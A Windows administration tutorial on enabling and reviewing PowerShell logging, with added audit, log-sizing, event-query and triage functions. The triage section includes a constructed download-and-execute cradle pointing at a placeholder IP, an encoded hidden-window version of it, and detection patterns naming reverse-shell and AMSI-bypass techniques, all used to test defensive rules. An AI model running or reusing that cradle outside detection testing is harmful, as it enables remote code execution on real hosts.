How to Enable PowerShell Logging?

In this tutorial, I will explain how to enable PowerShell logging to improve security and track PowerShell activity on your systems. As a system administrator, I faced challenges in monitoring the PowerShell scripts and commands executed across our network. Enabling PowerShell logging will help you secure your infrastructure and detect potential threats, because most post-exploitation tooling on Windows runs through PowerShell at some point and leaves little else behind.

Types of PowerShell Logging

There are several types of PowerShell logging that you can enable:

  1. Script Block Logging: Records the text of every script block as PowerShell compiles it, including code generated at run time (for example a string that is decoded and passed to Invoke-Expression), so obfuscated code is logged in its de-obfuscated form. Event ID 4104.
  2. Module Logging: Records pipeline execution details (commands, parameters and output) for the selected modules. Event ID 4103.
  3. Transcription Logging: Writes a text transcript of each session, input and output, to a file on disk.
  4. Engine Logging: The engine lifecycle events in the classic Windows PowerShell log, such as engine start (event ID 400) and stop (403), which Windows records by default.


Enable PowerShell Script Block Logging

Script block logging captures the text of every script block as it is executed, which makes it the single most useful PowerShell log for detection: code that arrives encoded or obfuscated is logged once it has been decoded and handed to the engine. Windows PowerShell 5.0 and later also logs script blocks it considers suspicious at Warning level even when this policy is off, but only the policy gives you everything. There are two ways to enable it:

1. Using Group Policy

  • Open Group Policy Management:
Press Win + R, type gpmc.msc, and press Enter.
  • Navigate to PowerShell Settings:
    • Go to Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell.
  • Enable Script Block Logging:
    • Double-click on Turn on PowerShell Script Block Logging.
    • Select Enabled and click OK.

2. Using PowerShell Cmdlets

Alternatively, you can set the same policy value directly in the registry from an elevated PowerShell session. Group Policy writes under HKLM:\SOFTWARE\Policies, and the ScriptBlockLogging key does not exist until a policy has been applied, so create it first:

# Requires an elevated session (HKLM write). Creates the policy key if absent.
$key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
New-Item -Path $key -Force | Out-Null
Set-ItemProperty -Path $key -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord

This writes the same value the Group Policy setting writes, so it takes effect for new PowerShell sessions without a reboot. Events appear as ID 4104 in the Microsoft-Windows-PowerShell/Operational log. Two caveats: if a domain GPO configures this setting, it overwrites the local value at the next policy refresh, and this key applies to Windows PowerShell 5.1; PowerShell 7 reads its own policy under HKLM:\SOFTWARE\Policies\Microsoft\PowerShellCore unless it is told to follow the Windows PowerShell setting.


Enable Module Logging

Module logging provides detailed information about the execution of commands within specific modules. Here’s how to enable it:

1. Using Group Policy

  1. Open Group Policy Management:
    • Press Win + R, type gpmc.msc, and press Enter.
  2. Navigate to PowerShell Settings:
    • Go to Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell.
  3. Enable Module Logging:
    • Double-click on Turn on Module Logging.
    • Select Enabled, then click Show... under Module Names and enter the modules to log, for example Microsoft.PowerShell.Management and Microsoft.PowerShell.Utility, or * to log every module.

2. Using PowerShell Cmdlets

To enable module logging from an elevated PowerShell session, set the policy value and populate the ModuleNames key. Each module to log is a value under ModuleNames whose name and data are both the module name; a single value named * logs every module:

# Requires an elevated session. Creates the policy keys if absent.
$key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging'
New-Item -Path "$key\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path $key -Name 'EnableModuleLogging' -Value 1 -Type DWord
Set-ItemProperty -Path "$key\ModuleNames" -Name '*' -Value '*'

This enables logging for all modules. Events appear as ID 4103 in the Microsoft-Windows-PowerShell/Operational log. Module logging is verbose (one event per pipeline stage, with parameter values), so plan log size and SIEM volume before turning it on for * across a fleet.


Enable PowerShell Transcription Logging

Transcription logging creates a text record of all PowerShell activities, including commands and output. Here’s how to enable it:

1. Using Group Policy

  1. Open Group Policy Management:
    • Press Win + R, type gpmc.msc, and press Enter.
  2. Navigate to PowerShell Settings:
    • Go to Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell.
  3. Enable Transcription Logging:
    • Double-click on Turn on PowerShell Transcription.
    • Select Enabled and specify the output directory for the transcripts, for example C:\PowerShellTranscripts. Tick Include invocation headers to add a timestamp to each command. If the directory is left empty, transcripts go to each user's Documents folder.

2. Using PowerShell Cmdlets

To enable transcription logging from an elevated PowerShell session:

# Requires an elevated session. Creates the policy key if absent.
$key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription'
New-Item -Path $key -Force | Out-Null
Set-ItemProperty -Path $key -Name 'EnableTranscripting' -Value 1 -Type DWord
Set-ItemProperty -Path $key -Name 'EnableInvocationHeader' -Value 1 -Type DWord
Set-ItemProperty -Path $key -Name 'OutputDirectory' -Value 'C:\PowerShellTranscripts'

This configures transcription logging, adds a timestamp header to every command, and sets the output directory. Transcripts are written into a per-session subfolder under that directory. Remember that they are plain text files on disk: every user whose sessions you want transcribed needs permission to create files there, but anyone with modify rights (and any local administrator) can delete them, so if you rely on transcripts as evidence, point OutputDirectory at a write-only network share or forward the files off the host.
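The three settings above are easy to get half-configured (a key created under the wrong path, a domain GPO silently resetting a local value, a transcript directory that users can empty). The following audit function, added here as an example and not part of the original article, reads back the same HKLM policy keys the Group Policy settings and the Set-ItemProperty commands write, plus the equivalent PowerShell 7 key under HKLM:\SOFTWARE\Policies\Microsoft\PowerShellCore, and reports what is actually in effect. The ACL check on the transcript directory is a constructed heuristic (it looks for Allow entries that give Everyone, Users or Authenticated Users delete or modify rights), not an official test. Reading HKLM policy keys does not require elevation.

```powershell
# Added example: audit the PowerShell logging policy on this host.

function Get-PolicyValue {
    # Returns the registry value, or $null when the key or value does not
    # exist, which is what "Not configured" looks like in the registry.
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }
}

function Test-TranscriptDirectoryAcl {
    # Constructed heuristic: flag Allow ACEs that let ordinary users modify or
    # delete transcripts. Users must be able to create files, but a transcript
    # the same user can delete afterwards is not a reliable record.
    param([string]$Path)
    if (-not $Path -or -not (Test-Path $Path)) { return @() }
    (Get-Acl -Path $Path).Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $_.IdentityReference -match 'Everyone|Users|Authenticated Users' -and
            $_.FileSystemRights -match 'Delete|Modify|FullControl'
        } |
        ForEach-Object { "$($_.IdentityReference): $($_.FileSystemRights)" }
}

function Get-PowerShellLoggingState {
    $wps  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'   # Windows PowerShell 5.1
    $core = 'HKLM:\SOFTWARE\Policies\Microsoft\PowerShellCore'       # PowerShell 7 (pwsh)

    $moduleNames = @()
    if (Test-Path "$wps\ModuleLogging\ModuleNames") {
        # Each value under ModuleNames is one logged module; "*" means all.
        $moduleNames = (Get-Item "$wps\ModuleLogging\ModuleNames").GetValueNames()
    }
    $transcriptDir = Get-PolicyValue "$wps\Transcription" 'OutputDirectory'

    [pscustomobject]@{
        ScriptBlockLogging      = (Get-PolicyValue "$wps\ScriptBlockLogging" 'EnableScriptBlockLogging') -eq 1
        ScriptBlockStartStop    = (Get-PolicyValue "$wps\ScriptBlockLogging" 'EnableScriptBlockInvocationLogging') -eq 1
        ModuleLogging           = (Get-PolicyValue "$wps\ModuleLogging" 'EnableModuleLogging') -eq 1
        ModuleNames             = ($moduleNames -join ', ')
        Transcription           = (Get-PolicyValue "$wps\Transcription" 'EnableTranscripting') -eq 1
        TranscriptHeaders       = (Get-PolicyValue "$wps\Transcription" 'EnableInvocationHeader') -eq 1
        TranscriptDirectory     = $transcriptDir            # empty => each user's Documents folder
        TranscriptDirWeakAcl    = @(Test-TranscriptDirectoryAcl $transcriptDir)
        # pwsh either follows the Windows PowerShell policy above or has its own.
        Pwsh7UsesWpsPolicy      = (Get-PolicyValue "$core\ScriptBlockLogging" 'UseWindowsPowerShellPolicySetting') -eq 1
        Pwsh7ScriptBlockLogging = (Get-PolicyValue "$core\ScriptBlockLogging" 'EnableScriptBlockLogging') -eq 1
    }
}

Get-PowerShellLoggingState | Format-List
```

Run it after a gpupdate on a sample of hosts: ScriptBlockLogging should be True everywhere, TranscriptDirWeakAcl should be empty, and on hosts with pwsh installed either Pwsh7UsesWpsPolicy or Pwsh7ScriptBlockLogging should be True, otherwise PowerShell 7 sessions are invisible to the policy you just deployed.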


Enable PowerShell Engine Logging

Engine lifecycle events (engine started, event ID 400; engine stopped, 403; provider started, 600) are written to the classic Windows PowerShell log, which is on by default and needs no policy. Script block (4104) and module logging (4103) events land in a different log, Microsoft-Windows-PowerShell/Operational, which is also enabled out of the box. The steps below therefore confirm that the Operational log is enabled rather than switch anything on. What does need attention is its size: the default maximum is only 15 MB, the log is circular, and a host with script block logging on overruns that within hours, after which the oldest events are overwritten.

1. Using Event Viewer

Follow the steps below to confirm the PowerShell Operational log is enabled in Event Viewer.

  1. Open Event Viewer:
    • Press Win + R, type eventvwr.msc, and press Enter.
  2. Navigate to PowerShell Logs:
    • Go to Applications and Services Logs > Microsoft > Windows > PowerShell > Operational.
  3. Check the Log:
    • Right-click on Operational. If the log is disabled the menu offers Enable Log; otherwise select Properties and raise the Maximum log size.

2. Using wevtutil

To do the same from the command line, use wevtutil (a Windows command-line tool, not a cmdlet, but it runs fine from an elevated PowerShell session):

wevtutil sl Microsoft-Windows-PowerShell/Operational /e:true

This command enables the PowerShell Operational log if it was disabled and is a no-op otherwise.
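Because log size matters more than the enable flag here, the following example (added for this page, not part of the original article) checks the three channels PowerShell writes to and raises the Operational channel's maximum size using the EventLogConfiguration objects that Get-WinEvent -ListLog returns. The 512 MB figure is a constructed starting point, not a recommendation; size it for your own event volume and retention. Changing a channel requires an elevated session.

```powershell
# Added example: report and resize the PowerShell event log channels.

function Get-PowerShellLogChannel {
    param(
        [string[]]$LogName = @(
            'Windows PowerShell',                        # engine lifecycle: 400 started, 403 stopped
            'Microsoft-Windows-PowerShell/Operational',  # 4103 module logging, 4104 script block logging
            'PowerShellCore/Operational'                 # the same for PowerShell 7, present only if pwsh is installed
        )
    )
    foreach ($name in $LogName) {
        $log = Get-WinEvent -ListLog $name -ErrorAction SilentlyContinue
        if (-not $log) {
            Write-Warning "Channel '$name' not found (PowerShell 7 not installed?)"
            continue
        }
        [pscustomobject]@{
            LogName   = $log.LogName
            IsEnabled = $log.IsEnabled
            MaxSizeMB = [math]::Round($log.MaximumSizeInBytes / 1MB)
            Records   = $log.RecordCount
            LogMode   = $log.LogMode          # Circular: oldest events are overwritten when full
        }
    }
}

function Set-PowerShellLogChannel {
    # Enables the channel and sets its maximum size. Requires administrator rights.
    param(
        [Parameter(Mandatory)][string]$LogName,
        [int]$MaxSizeMB = 512                 # constructed default, tune for your volume
    )
    $log = Get-WinEvent -ListLog $LogName -ErrorAction Stop
    $log.IsEnabled = $true
    $log.MaximumSizeInBytes = $MaxSizeMB * 1MB
    $log.SaveChanges()
}

Get-PowerShellLogChannel | Format-Table -AutoSize
Set-PowerShellLogChannel -LogName 'Microsoft-Windows-PowerShell/Operational' -MaxSizeMB 512
Get-PowerShellLogChannel -LogName 'Microsoft-Windows-PowerShell/Operational'
```

A large local log is only a buffer; if the host is compromised, an administrator-level attacker can clear it (which itself produces a Security log event 1102 or System event 104), so forward 4103/4104 events to your SIEM as they are written rather than relying on the local copy.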


Review PowerShell Logs

Once you have enabled PowerShell logging, you can review the logs using Event Viewer, Get-WinEvent, or a SIEM solution that collects the channel. Here's how to access the logs in Event Viewer:

  1. Open Event Viewer:
    • Press Win + R, type eventvwr.msc, and press Enter.
  2. Navigate to PowerShell Logs:
    • Go to Applications and Services Logs > Microsoft > Windows > PowerShell.
  3. Review the Logs:
    • Examine the Operational log (event ID 4103 for module logging, 4104 for script block logging; the Admin log under the same node is normally empty) and, for engine start and stop events (400 and 403), the classic Windows PowerShell log directly under Applications and Services Logs. PowerShell 7 sessions log to Applications and Services Logs > PowerShellCore > Operational instead.
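Clicking through 4104 events in Event Viewer does not scale, and it hides a detail that matters during an investigation: PowerShell splits long script blocks across several 4104 events, each carrying the same ScriptBlockId plus a MessageNumber / MessageTotal pair, so searching single events can show you a fragment and miss the part that does the damage. The function below, added here as an example and not taken from the original article, pulls 4104 events with Get-WinEvent and stitches the chunks back together. The property order it relies on (MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path) is the 4104 event's own layout; the 24-hour default window and 5000-event cap are assumptions for interactive use. Reading the Operational channel requires administrator rights or membership in Event Log Readers.

```powershell
# Added example: query script block logging events and reassemble split blocks.

function Get-ScriptBlockEvent {
    param(
        [datetime]$Since   = (Get-Date).AddHours(-24),
        [string]  $LogName = 'Microsoft-Windows-PowerShell/Operational',
        [int]     $MaxEvents = 5000   # a cap this low can cut a multi-part block; Complete tells you
    )
    $filter = @{ LogName = $LogName; Id = 4104; StartTime = $Since }
    $events = Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue
    if (-not $events) { return }

    $events |
        ForEach-Object {
            [pscustomobject]@{
                Time          = $_.TimeCreated
                UserId        = $_.UserId               # SID of the account that ran the code
                ProcessId     = $_.ProcessId
                Level         = $_.LevelDisplayName     # 'Warning' = PowerShell's own suspicious-block heuristic fired
                MessageNumber = [int]$_.Properties[0].Value
                MessageTotal  = [int]$_.Properties[1].Value
                Text          = [string]$_.Properties[2].Value
                ScriptBlockId = [string]$_.Properties[3].Value
                Path          = [string]$_.Properties[4].Value   # empty for interactive or in-memory code
            }
        } |
        Group-Object ScriptBlockId |
        ForEach-Object {
            # One output object per script block, chunks concatenated in order.
            $parts = @($_.Group | Sort-Object MessageNumber)
            $first = $parts[0]
            [pscustomobject]@{
                Time          = $first.Time
                UserId        = $first.UserId
                ProcessId     = $first.ProcessId
                Level         = $first.Level
                ScriptBlockId = $_.Name
                Path          = $first.Path
                Complete      = ($parts.Count -eq $first.MessageTotal)   # $false if chunks were rotated out or capped
                Text          = ($parts.Text -join '')
            }
        }
}

# Usage: everything from the last 7 days that PowerShell itself flagged as
# suspicious, newest first, with multi-part blocks already reassembled.
Get-ScriptBlockEvent -Since (Get-Date).AddDays(-7) |
    Where-Object { $_.Level -eq 'Warning' } |
    Sort-Object Time -Descending |
    Format-List Time, UserId, ProcessId, Path, Complete, Text
```

The Level filter is a cheap first pass because PowerShell marks blocks that use known dangerous APIs and encoding tricks at Warning level on its own; drop it to see the full volume, and pair ProcessId with a process-creation log (Sysmon event 1 or Security event 4688) to learn what launched the session.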


Practical Example: Detect Malicious PowerShell Activity

Let’s consider a practical example where PowerShell logging helped detect and mitigate a security threat.

In our organization, we noticed unusual network activity originating from a server named US-Server01. By enabling PowerShell logging, we were able to track down the source of the activity.

These are the steps we followed, and you can apply the same sequence to track malicious PowerShell activity in your own environment.

  1. Enable Script Block Logging:
    • We enabled script block logging using Group Policy to capture the content of executed scripts.
  2. Review Logs:
    • Using Event Viewer, we reviewed the PowerShell Operational logs and found a suspicious script block attempting to download and execute a remote script.
  3. Investigate and Mitigate:
    • We isolated US-Server01 and analyzed the script block. It turned out to be a malicious script attempting to establish a reverse shell.
    • We removed the malicious script and implemented additional security measures to prevent future incidents.
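The script block in the incident above was found by reading logs by hand. To make that repeatable, the following rule set, added here as an example and not code from the original article, scores script block text for the download-and-execute pattern and the wrappers that usually accompany it (dynamic execution, encoded commands, hidden windows, TCP client objects used by reverse shells). It decodes -EncodedCommand arguments, which are base64 of UTF-16LE text, so the same rules fire on the decoded payload. The samples are constructed strings (the 192.0.2.10 address is from the documentation range), and the patterns are a starting point for your own tuning, not an exhaustive signature set; feed it the Text field of reassembled 4104 events in practice.

```powershell
# Added example: pattern-based triage of script block text, run on constructed samples.

$TriageRules = @(
    @{ Name = 'Download cradle';   Pattern = 'Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|Start-BitsTransfer' }
    @{ Name = 'Dynamic execution'; Pattern = 'Invoke-Expression|\biex\b|\[ScriptBlock\]::Create' }
    @{ Name = 'Encoded command';   Pattern = '(?i)-e[ncodema]*\s+[A-Za-z0-9+/=]{20,}|FromBase64String' }
    @{ Name = 'Reverse shell';     Pattern = 'Net\.Sockets\.TcpClient|\.GetStream\(\)|AcceptTcpClient' }
    @{ Name = 'Defense evasion';   Pattern = '-NoP[rofile]*\b|-W[indowStyle]*\s+Hidden|-E[xecutionPolicy]*\s+Bypass|Set-MpPreference|AmsiUtils' }
)

function Expand-EncodedCommand {
    # Returns the decoded text of every -EncodedCommand (-e, -enc, ...) argument
    # in $Text. PowerShell accepts any unambiguous prefix, hence the loose regex.
    param([string]$Text)
    foreach ($m in [regex]::Matches($Text, '(?i)-e[ncodema]*\s+([A-Za-z0-9+/=]{20,})')) {
        try { [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value)) }
        catch { }   # not valid base64: the raw text is still checked by the other rules
    }
}

function Invoke-ScriptBlockTriage {
    param(
        [Parameter(Mandatory, ValueFromPipeline)][string]$Text,
        [string]$Source = '<unknown>'
    )
    process {
        $decoded = @(Expand-EncodedCommand $Text)
        $corpus  = @($Text) + $decoded          # raw text plus any decoded payloads
        $hits = foreach ($rule in $TriageRules) {
            # -match on an array returns the matching elements; empty means no hit
            if ($corpus -match $rule.Pattern) { $rule.Name }
        }
        [pscustomobject]@{
            Source  = $Source
            Score   = @($hits).Count
            Rules   = ($hits -join ', ')
            Decoded = ($decoded -join ' | ')
            Snippet = $Text.Substring(0, [Math]::Min(80, $Text.Length))
        }
    }
}

# Constructed samples: one routine admin command and two in the style of the
# incident above. These are illustrative strings, not real malware.
$cradle  = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage.ps1')"
$samples = @(
    @{ Source = 'benign';  Text = 'Get-Service | Where-Object Status -eq Running | Export-Csv C:\temp\svc.csv' }
    @{ Source = 'cradle';  Text = $cradle }
    @{ Source = 'encoded'; Text = 'powershell.exe -NoP -W Hidden -Enc ' +
                                  [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cradle)) }
)

$samples |
    ForEach-Object { Invoke-ScriptBlockTriage -Text $_.Text -Source $_.Source } |
    Sort-Object Score -Descending |
    Format-Table Source, Score, Rules, Snippet -AutoSize
```

On these samples the benign command scores 0, the plain cradle hits Download cradle and Dynamic execution, and the encoded variant additionally hits Encoded command and Defense evasion because the decoded payload is scanned too. Treat the score as a sort key for analyst attention, not a verdict: legitimate deployment scripts use Invoke-WebRequest and encoded commands as well, so tune the rules against a week of your own 4104 volume before alerting on them.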

Conclusion

Once you enable PowerShell logging, you can detect and respond to threats promptly, limiting the damage to your network. By capturing detailed logs of PowerShell activity, forwarding them off the host, and reviewing them with the queries above, you can monitor, audit, and respond to suspicious behavior effectively. I hope you now understand how to enable PowerShell logging.
